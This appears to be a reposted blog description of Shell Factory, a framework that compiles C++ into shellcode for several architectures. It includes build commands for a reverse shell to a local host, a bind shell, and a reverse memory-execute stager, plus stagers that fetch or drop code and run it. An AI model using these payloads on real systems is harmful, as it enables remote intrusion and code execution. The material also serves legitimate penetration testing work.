Shellcode Builder: Shell Factory

Shellcode Builder: Shell Factory

Shell Factory is a framework for compiling shellcodes from a C++ source for multiple systems and architectures.

It is composed of multiple parts:

  • a Rakefile for compiling and linking against different compilers and architectures.
  • the factory, a set of C++ headers to generate system calls for different systems and architectures.
  • picolib, a generic C++ library relying on the system call factory to abstract interactions the target system.

The shellcode is compiled as a single compilation unit with common optimizations to reduce its code size.

The resulting file is supposed to be a single binary blob executable from anywhere in memory, starting at offset 0.

 

Requirements

 

Linux

 

OS X

 

Basic usage

Put your shellcode source file in the shellcodes directory, then compile it with rake <shellcode>.

For example, create a template file named shellcodes/template.cc :

#include <factory.h>
#include <pico.h>

using namespace Pico;

SHELLCODE_ENTRY {
    Process::exit(0);
}

Then compile it with: rake template. On a Linux amd64 system, this will generate the files bins/template.elf and bins/template.x86_64-linux.bin.

$ objdump -d bins/template.elf

00000000004000b0 <_start>:
  4000b0:       31 ff                   xor    %edi,%edi
  4000b2:       b8 e7 00 00 00          mov    $0xe7,%eax
  4000b7:       0f 05                   syscall

 

Default shellcodes

Three generic stager shellcodes are provided in the shellcodes directory:

  • shellexec : runs a standard /bin/sh shell or any specified command.
  • memexec : allocates executable memory, receives data and executes it.
  • dropexec : reads data, drops an executable file on the system and executes it.

 

Channels

Channels are an abstraction layer that allows to use different kind of data streams configurable through compilation variables: files, sockets, opened file descriptors.

They are typically used by shellexec, memexec and dropexec to receive and send data. The default channels used are the standard input/output when none are specified.

 

Examples


Reverse shell on the local network
rake shellexec CHANNEL=TCP_CONNECT HOST=192.168.0.2 PORT=2222

 

Bind-shell TCPv6
rake shellexec CHANNEL=TCP6_LISTEN HOST=::1 PORT=1111

 

Reverse memory execute over SCTPv6
rake memexec CHANNEL=SCTP6_CONNECT HOST=fe80::800:27ff:fe00:0 PORT=3333

 

Supported targets

x86 amd64 ARM Aarch64 PowerPC SH4 MIPS
Linux
FreeBSD
OS X

Items marked as ∼ are a work in progress and are not fully implemented yet.

 

Shellcode Builder: Shell Factory Download

Source: CyberPunk @ February 27, 2017 at 10:37AM

0
Share